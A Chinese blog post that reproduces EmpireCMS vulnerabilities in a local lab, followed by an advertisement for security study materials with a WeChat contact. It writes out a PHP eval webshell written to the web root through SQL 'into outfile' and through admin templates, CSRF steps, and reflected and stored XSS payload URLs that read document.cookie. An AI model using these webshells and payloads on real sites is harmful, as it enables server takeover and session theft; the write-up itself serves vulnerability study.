EmpireCMS4,跳槽大厂必看

image.png
这样是无法连接蚁剑的,尝试将tablename后改为一句话木马
Snipaste_2023-05-28_17-06-45.jpg
当放包之后会出现表不存在等问题,不过不影响
image.png
hackbar后
image.png
同上的操作(或者也可以不执行这步,可以从链接当中知道文件的所在路径)
image.png
image.png
目录遍历,shell拿到了
image.png

代码注入获取shell

select … into outfile语句写入php一句话木马

select ‘<?php @eval($\_POST[LEOGG])?>’ into outfile ‘C:/phpStudy/PHPTutorial/WWW/EmpireCMS/e/admin/1.php’

出现下面这种错误明显是不能够成功的,它限制数据库的导入跟导出,判断secure_file_priv = NULL,所以当实战中出现在这种情况下是不能够用这种方法
image.png
添加上这句语句在做尝试
image.png
显示无法写入文件
image.png
漏洞复现文章出处:https://blog.csdn.net/m0_60716947/article/details/128354934

后台拿SHELL
模板–》公告模板–》JS调用登录模板

在此位置插入一句话木马,最终
image.png
源码当中的一句话木马已经被写入,证明肯定时写入到文件里面了
image.png
链接蚁剑,拿取shell
image.png
image.png
遍历目录
image.png

获取shell
栏目–》自定义页面–》管理自定义页面处可以写下getshell

image.png
成功在网站根目录写入webshell
image.png
连接蚁剑

image.png
目录遍历
image.png

(二)CSRF(跨站请求伪造)

1.在会员中心页面点击修改密码时抓包
image.png
image.png
image.png
将上述的html代码,编写成脚本放到phpstudy下的www目录
image.png
image.png

(三)XSS(跨站脚本攻击)

A、反射型:

通过目录扫描,我们可以知道很多存在漏洞的网页

1.漏洞代码位置:EmpireCMS/e/ViewImg/index.html

可以先创建栏目信息
image.png
然后点击图片
image.png
漏洞页面
image.png
#漏洞原理:url地址经过Request函数处理之后,
把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值
代码分析

if(Request(“url”)!=0){
document.write(
“<a title=“点击观看完整的图片…” href=”“+Request(“url”)+”" target=“_blank”>
<img src=“”+Request(“url”)+“” border=0
class=“picborder” onmousewheel=“return bbimg(this)”
οnlοad=“if(this.width>screen.width-500)this.style.width=screen.width-500;”>");

分析代码:通过window.location获取当前url地址,根据传入的url参数,获取当前参数的起始位置和结束位置。
代码没有对url的参数做过滤就直接拼接成a和img标签的属性的值,因此可以构造payload:? ?url=javascript:alert(/xss/)

例如,地址是:index.html?url=javascript:alert(document.cookie),经过Request函数处理就变成javascript:alert(document.cookie)
构造payload:

http://192.168.200.16/EmpireCMS/e/ViewImg/index.html?url=javascript:alert(document.cookie)

image.png
点击图片可以触发cookie,但是此漏洞我没有复现成功,是在控制器当中输入的javascript:alert(document.cookie)的指令
漏洞存在的文件是在/e/ViewImg/index.html。
分析代码:通过window.location获取当前url地址,根据传入的url参数,获取当前参数的起始位置和结束位置。

代码没有对url的参数做过滤就直接拼接成a和img标签的属性的值,因此可以构造payload:? ?url=javascript:alert(/xss/)

例如,地址是:index.html?url=javascript:alert(document.cookie),经过Request函数处理就变成javascript:alert(document.cookie)

image.png

案例:

2.软件作者栏目,软件简介栏目两处存在跨站脚本攻击漏洞,前台此连接处显示漏洞

image.png
image.png
图片内的栏目信息全部都含有如上图的xss漏洞
image.png

3.京股票验证国内新闻栏目含有XSS漏洞,并且需要创建信的栏目才可以实现

image.png
image.png
image.png

4.信息栏目处,几乎每一个大栏目下的都含有XSS漏洞

image.png
image.png

5.经验证,在栏目信息下的所有大的栏目下都含有前台显示的XSS漏洞

image.png
image.png

6.再次处,插入几条xss语句就会显示几个弹窗,在SQL名称处含有一处XSS

image.png

B、存储型
1.漏洞出现的页面在/e/admin/openpage/AdminPage.php

源码:
image.png
访问显示页面非法来源
image.png
构造发现依然无效

http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?mainfile=javascript:alert(‘xss’)

别的页面url地址中都会存在hash参数,例如ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6,参数是随机生成的,如果缺少这个参数,会提示非法来源(都要使用)
重新构造payload,有效!

http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6&mainfile=javascript:alert(‘xss’)

image.png
mainfile参数:获取cookie

http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6&mainfile=javascript:alert(document.cookie)

image.png
leftfile参数

http://192.168.200.16/EmpireCMS/e/admin/openpage/AdminPage.php?ehash_xAg67=sKjkNY3V9KKhz7rFcbRC&leftfile=javascript:alert(‘xss’)

image.png
而title参数,是无法显示出来页面信息的

http://192.168.200.16/EmpireCMS/e/admin/openpage/AdminPage.php?ehash_xAg67=sKjkNY3V9KKhz7rFcbRC&title=javascript:alert(%27xss%27)

image.png
image.png

2.栏目–》管理栏目

image.png
每次点进页面会自动触发

image.png
image.png

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!**](https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0)

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值